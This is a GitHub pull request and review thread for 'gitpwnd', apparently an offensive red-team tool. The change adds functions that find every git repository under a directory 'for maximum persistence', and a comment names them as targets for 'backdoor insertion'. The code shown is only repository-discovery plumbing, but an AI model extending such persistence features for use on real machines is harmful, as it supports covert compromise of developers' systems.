### PR TITLE
More minor fixes

### PR DESCRIPTION
**Pull request by kishorbhat**
Changelog:
- fixes a typo in `agent.py`
- adds missing server requirements
- identifies all git repos in `base_dir` for maximum persistence

### CODE REVIEW

File: gitpwnd/bootstrap.py.template [hunk 1]
```diff
@@ -177,9 +177,17 @@ def find_root_of_git_repo(path):
         else:
             cur_dir = os.path.join(cur_dir, "..")
 
-# TODO: Iterate through all dirs in base_dir and find all the git repos
+def is_git_directory(path):
+    exit_code = subprocess.call(["git", "status"], cwd=path, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
```
Comment (clintgibler) [inline gitpwnd/bootstrap.py.template:181]: Nice. If we're assuming that `path` is the root of the git directory, then a simpler way may be to just check for the presence of a `path/.git`, which doesn't require subprocess.

The way you're doing it is nice in that if we're in any subdirectory of a git repo it'll still work. Thoughts?

File: gitpwnd/bootstrap.py.template [hunk 2]
```diff
@@ -177,9 +177,17 @@ def find_root_of_git_repo(path):
...
+    return (exit_code == 0)
+
 def find_git_repos(base_dir):
-    return []
+    git_repos = []
+    for directory in next(os.walk())[1]:
```
Comment (clintgibler) [inline gitpwnd/bootstrap.py.template]: It doesn't look like you're using the function's argument,`base_dir`, when iterating over files, am I reading this wrong?

File: gitpwnd/bootstrap.py.template (hunk 1 above)
Comment (kishorbhat) [reply gitpwnd/bootstrap.py.template:181]: > The way you're doing it is nice in that if we're in any subdirectory of a git repo it'll still work.

Right, that was my intention. This way, the function will work if we want to explore arbitrary other locations on the filesystem as potential targets for backdoor insertion. I don't think the overhead is *too* much; it makes sense to me to have something that works anywhere in the git repo as opposed to only in the root. Purely future-proofing, though.

File: gitpwnd/bootstrap.py.template (hunk 2 above)
Comment (kishorbhat) [reply gitpwnd/bootstrap.py.template]: Whoops, my bad. Fixed!

File: gitpwnd/bootstrap.py.template (hunk 1 above)
Comment (clintgibler) [reply gitpwnd/bootstrap.py.template:181]: Sure, makes sense to me 👍

**Comment by clintgibler** [comment]
Awesome, thanks a bunch! 💃

**Pull request merged**